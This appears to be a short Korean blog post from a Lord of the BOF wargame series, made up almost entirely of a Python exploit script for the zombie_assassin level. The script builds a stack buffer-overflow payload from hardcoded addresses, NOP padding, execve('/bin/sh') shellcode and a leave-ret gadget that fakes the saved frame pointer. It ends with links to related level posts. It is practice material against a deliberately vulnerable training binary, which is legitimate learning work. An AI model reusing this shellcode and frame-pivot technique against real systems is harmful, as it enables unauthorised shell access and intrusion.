exploit.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/assassin/zombie_assassin'
leaveRetGaget = p(0x80484df)
shellAddress = p(0xbffffa74)
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
fEbpAddress = p(0xbffffa6c)
payload = shellAddress+"\x90"*11+shellCode+fEbpAddress+leaveRetGaget
os.execl(path,path,payload)
'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글
| [Remind] LOB succubus -> nightmare (0) | 2019.04.22 |
|---|---|
| [Remind] LOB zombie_assassin-> succubus (0) | 2019.04.19 |
| [Remind] LOB giant-> assassin (0) | 2019.04.18 |
| [Remind] LOB bugbear -> giant (0) | 2019.04.18 |
| [Remind] LOB darkknight -> bugbear (0) | 2019.04.16 |
JeonYoungSin
메모 기록용 공간